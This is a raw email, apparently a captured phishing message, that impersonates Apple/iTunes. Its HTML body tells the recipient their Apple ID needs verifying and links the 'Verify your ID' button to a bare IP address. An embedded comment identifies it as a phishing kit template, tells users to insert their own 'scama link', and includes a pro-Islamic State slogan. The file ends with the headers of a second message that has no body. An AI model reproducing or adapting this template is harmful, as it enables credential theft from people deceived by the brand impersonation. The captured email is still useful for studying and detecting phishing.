From: "iTunes." <official@ail.com>
Subject: You just need to confirm your account.
To: jose@gcinter.com
Content-Type: text/html;iso-8859-1
Reply-To: official@ail.com
Date: Wed, 13 Jul 2016 00:28:23 -0700
X-Priority: 3
X-Library: Indy 8.0.25
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - ns-02.soikdd.com
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - ail.com
X-Get-Message-Sender-Via: ns-02.soikdd.com: authenticated_id: patmuggleton/only user confirmed/virtual account not confirmed
X-Authenticated-Sender: ns-02.soikdd.com: patmuggleton
Status: O
X-Status: 
X-Keywords:                  
X-UID: 295


<!--
  /*****************************************************************************\
  |             Assalamu Aleikom akhi : Lettre Apple  English  2016             |
  |                                                                             |   
  |                         Coded By Noureddine ElmGhreBi                       |                                                                         
  |                                                                             |                                                                         
  |           Change www.facebook.com/Nour.Blog1  To your scama link            |
  |                                                                             |                                                                         
  |          Follow Us On facebook : https://www.facebook.com/Nour.Blog1        |
  |                                                                             |
  |                   WebSite: http://nourblog1.blogspot.com/                   |
  |                                                                             |
  \*****************************************************************************/
   /*____________________iSlaMic State = Caliphate isLaMiC____________________*/
--><html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta name="viewport" content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;">
        <style type="text/css">body { width: 100% !important;}</style>
		<style>
.myButton {
	-moz-box-shadow:inset 0px 1px 0px 0px #195c85;
	-webkit-box-shadow:inset 0px 1px 0px 0px #195c85;
	box-shadow:inset 0px 1px 0px 0px #195c85;
	background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #195c85), color-stop(1, #195c85));
	background:-moz-linear-gradient(top, #195c85 5%, #195c85 100%);
	background:-webkit-linear-gradient(top, #195c85 5%, #195c85 100%);
	background:-o-linear-gradient(top, #195c85 5%, #195c85 100%);
	background:-ms-linear-gradient(top, #195c85 5%, #195c85 100%);
	background:linear-gradient(to bottom, #195c85 5%, #195c85 100%);
	filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#195c85', endColorstr='#195c85',GradientType=0);
	background-color:#195c85;
	-moz-border-radius:6px;
	-webkit-border-radius:6px;
	border-radius:6px;
	border:1px solid #195c85;
	display:inline-block;
	cursor:pointer;
	color:#ffffff;
	font-family:Arial;
	font-size:15px;
	font-weight:bold;
	padding:6px 24px;
	text-decoration:none;
	text-shadow:0px 1px 0px #195c85;
}
.myButton:hover {
	background:-webkit-gradient(linear, left top, left bottom, color-stop(0.05, #195c85), color-stop(1, #195c85));
	background:-moz-linear-gradient(top, #195c85 5%, #195c85 100%);
	background:-webkit-linear-gradient(top, #195c85 5%, #195c85 100%);
	background:-o-linear-gradient(top, #195c85 5%, #195c85 100%);
	background:-ms-linear-gradient(top, #195c85 5%, #195c85 100%);
	background:linear-gradient(to bottom, #195c85 5%, #195c85 100%);
	filter:progid:DXImageTransform.Microsoft.gradient(startColorstr='#195c85', endColorstr='#195c85',GradientType=0);
	background-color:#195c85;
}
.myButton:active {
	position:relative;
	top:1px;
}
		</style>
<style type="text/css">
body{
        margin: 0;
        padding: 0;
        padding-top: 10px;
        color: #FFF;
        font-family: Calibri;
        font-size: 13px;
}
a{
        color: white;
        text-decoration: none;
        font-weight: bold;
}
.wrapper{
        width: 800px;
        margin: 0 auto;
}
.tube{
        padding: 10px;
}
.t{
        padding: 10px;
}
.red{
        width: 800px;
        border: 1px solid #e52224;
        background: #191919;
        color: #e52224
}

}
.blue{
        float: left;
        width: 800px;
        border: 1px solid #1d7fc3;
        background: #191919;
        color: #1d7fc3;
}
.green{
        float: left;
        width: 800px;
        border: 1px solid #5fd419;
        background: #191919;
        color: #5fd419;
}
.g{
        float: center;
        width: 900px;
        border: 1px solid #5fd419;
        background: #191919;
        color: red;
}
</style>
        <link rel="stylesheet" href="http://niceshopweb.com/lettre/Anonismaaa.css">
    </head>
    <body style="PADDING-BOTTOM: 0px; PADDING-TOP: 0px; PADDING-LEFT: 0px; MARGIN: 0px; PADDING-RIGHT: 0px; BACKGROUND-COLOR: #f6f6f6" >
        <table id="Maroooooooooooooooc" style="WIDTH: 100%" cellspacing="0" cellpadding="0" border="0">
            <tbody>
                <tr>
                    <td id="Anoniiiismaaaaaaaaaaaaa" style="PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; BACKGROUND-COLOR: #f6f6f6" align="center">
                        <table id="Anoniiisma" class="Anoniiiisma" cellspacing="0" cellpadding="0" width="600" border="0">
                            <tbody>
                                <tr>
                                    <td style="PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px" valign="top" align="center">
                                        <div id="Anoniiiismaaaaaaaaaaa" class="joooooooooop" style="FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #646464" customcolor="true">&nbsp;<br></div>
                                    </td>
                                </tr>
                                <tr>
                                    <td id="Anoniiiismaaaaaaaaaaaa" style="BORDER-TOP-COLOR: #5b5b5b; BACKGROUND: #d9d9d9; PADDING-BOTTOM: 0px; BORDER-BOTTOM-COLOR: #5b5b5b; PADDING-TOP: 0px; PADDING-LEFT: 0px; BORDER-RIGHT-COLOR: #5b5b5b; PADDING-RIGHT: 0px; BORDER-LEFT-COLOR: #5b5b5b" valign="top">
                                        <div id="D7koooooooooooooooooooooooooo" class="9ahwa" wizardid="1col-T">
                                            <table id="hhhhhhhhhhhhhhhhhhhhhhhhhhhhh" class="hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh" cellspacing="0" cellpadding="0" width="600" border="0">
                                                <tbody>
                                                    <tr>
                                                        <td class="zebiiii" style="BORDER-TOP-COLOR: #ffffff; BACKGROUND: #747474; BORDER-BOTTOM-COLOR: #ffffff; BORDER-RIGHT-COLOR: #ffffff; BORDER-LEFT-COLOR: #ffffff" valign="top" align="left" >
   
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </div>
                                        <div id="jajajaajjaja" class="9ahwa" wizardid="1col-CFI">
                                            <table id="9lawi" class="hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh" cellspacing="0" cellpadding="0" width="600" border="0">
                                                <tbody>
                                                    <tr>
                                                        <td class="zebiiii" style="BORDER-TOP: #ffffff 2px solid; BORDER-RIGHT: #ffffff 2px solid; BACKGROUND: #ffffff; BORDER-BOTTOM: #ffffff 2px solid; BORDER-LEFT: #ffffff 2px solid" valign="top" align="left">
                                                            <table id="1111111111aa" class="hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh" cellspacing="0" cellpadding="0" width="596" align="left" border="0">
                                                                <tbody>
                                                                    <tr>
                                                                        <td id="352435435" class="9ahwaa" style="PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; Anonismaaa: 0; Anonismaaaa: 0" valign="top">
                                                                            <div id="4444" class="Marooooooooooooooc" style="FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #646464">
                                                                                <center><img id="hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh" class="img_float" style="BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-TOP-WIDTH: 0px" hspace="5" vspace="5" src="http://1.bp.blogspot.com/-T0Vw3cLavgY/VnmGr1ZeeLI/AAAAAAAAAJw/ahPsul-gvAM/s1600-r/logo.png" width="250" height="100" > </center>
                                                                            </div>
                                                                        </td>
                                                                    </tr>
                                                                </tbody>
                                                            </table>
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </div>
                                        <div id="8888" class="9ahwa" wizardid="1col-T">
                                            <table id="6969" class="hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh" cellspacing="0" cellpadding="0" width="600" border="0">
                                                <tbody>
                                                    <tr>
                                                        <td class="zebiiii" style="BORDER-TOP-COLOR: #ffffff; BACKGROUND: #e5e5e5; BORDER-BOTTOM-COLOR: #ffffff; BORDER-RIGHT-COLOR: #ffffff; BORDER-LEFT-COLOR: #ffffff" valign="top" align="left" >
                                                            <table id="987445" class="hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh" cellspacing="0" cellpadding="0" width="600" align="left" border="0">
                                                                <tbody>
                                                                    <tr>
                                                                        <td id="000" class="9ahwaa" style="PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; Anonismaaa: 0; Anonismaaaa: 0" valign="top">
                                                                            <div id="000000" class="Marooooooooooooooc" style="FONT-SIZE: 14px; FONT-FAMILY: Arial; COLOR: #646464">
                                                                                <strong>Dear Client,</strong><br>&nbsp;<br>
                                                                                <p style="MARGIN-RIGHT: 0px" dir="ltr" align="left">We've noticed that some of your account information appears to be missing or incorrect We need to verify your account information in order to continue using your Apple ID, Please Verify your account information by clicking on the link below</p>
                                                                                <center><div class="myButton"><a href="http://84.19.27.254/~skdjsdhc/Appe/">Click here to Verify your ID</A></center>
																				<hr align="left" noshade="noshade" size="3" color="#D1D4DB" width="100%" />
                                                                            </div>
                                                                        </td>
                                                                    </tr>
                                                                </tbody>
                                                            </table>
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </div>
                                        <div id="2222222" class="9ahwa" wizardid="1col-T">
                                            <table id="55545" class="hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh" cellspacing="0" cellpadding="0" width="600" border="0">
                                                <tbody>
                                                    <tr>
                                                        <td class="zebiiii" style="BORDER-TOP: #ffffff; BORDER-RIGHT: #ffffff; BACKGROUND: #e4e4e4; BORDER-BOTTOM: #ffffff; BORDER-LEFT: #ffffff" valign="top" align="left" >
                                                            <table id="00001" class="hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh" cellspacing="0" cellpadding="0" width="600" align="left" border="0">
                                                                <tbody>
                                                                    <tr>
                                                                        <td id="01" class="9ahwaa" style="PADDING-BOTTOM: 10px; PADDING-TOP: 10px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; Anonismaaa: 0; Anonismaaaa: 0" valign="top">
                                                                            <p align="left"><b><font color="#646464">© 2016 Apple. All rights reserved.</font></b></p>
<b><font color="#646464">Email ID: 163327</font></b>
                                                                        </td>
                                                                    </tr>
                                                                </tbody>
                                                            </table>
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </div>
                                        <div id="meknas" class="9ahwa" wizardid="1col-I">
                                            <table id="Meknasi" class="hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh" cellspacing="0" cellpadding="0" width="600" border="0">
                                                <tbody>
                                                    <tr>
                                                        <td class="zebiiii" style="BORDER-TOP-COLOR: #ffffff; BACKGROUND: #ffffff; BORDER-BOTTOM-COLOR: #ffffff; BORDER-RIGHT-COLOR: #ffffff; BORDER-LEFT-COLOR: #ffffff" valign="top" align="left">
                                                            
                                                        </td>
                                                    </tr>
                                                </tbody>
                                            </table>
                                        </div>
                                    </td>
                                </tr>
                                </tbody>
                        </table>
                    </td>
                </tr>
            </tbody>
        </table>
    </body>
</html>

From jose@monkey.org Thu Jul 14 00:22:49 2016 +0000
Return-Path: codewizard@approject.com
Delivered-To: jose@monkey.org
X-FDA: 71733104058.16.beast19_65ce088d10e2a
X-Spam-Summary: 30,2,0,d41d8cd98f00b204,d41d8cd98f00b204,codewizard@approject.com,:,RULES_HIT:355:379:871:988:989:1000:1260:1308:1309:1313:1314:1345:1381:1516:1522:1575:1692:1730:1747:1764:1777:1792:2392:2393:2559:2562:3138:3139:3140:3141:3142:3876:3877:5007:6114:6261:6264:6506:6642:6747:6748:7281:7398:10004:11604:11914:12340:12836:13110:14129:14659:21080:30001:30054:30055,0,RBL:109.126.9.142:@approject.com:.lbl8.mailshell.net-62.8.3.100 64.201.201.201,CacheIP:none,Bayesian:0.5,0.5,0.5,Netcheck:none,DomainCache:0,MSF:not bulk,SPF:fn,MSBL:0,DNSBL:neutral,Custom_rules:0:0:0,LFtime:66,LUA_SUMMARY:none
X-HE-Tag: beast19_65ce088d10e2a
X-Filterd-Recvd-Size: 132485
Received: from approject.com (mail.ingredient.pro [109.126.9.142])
	by imf07.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Thu, 14 Jul 2016 00:21:39 +0000 (UTC)
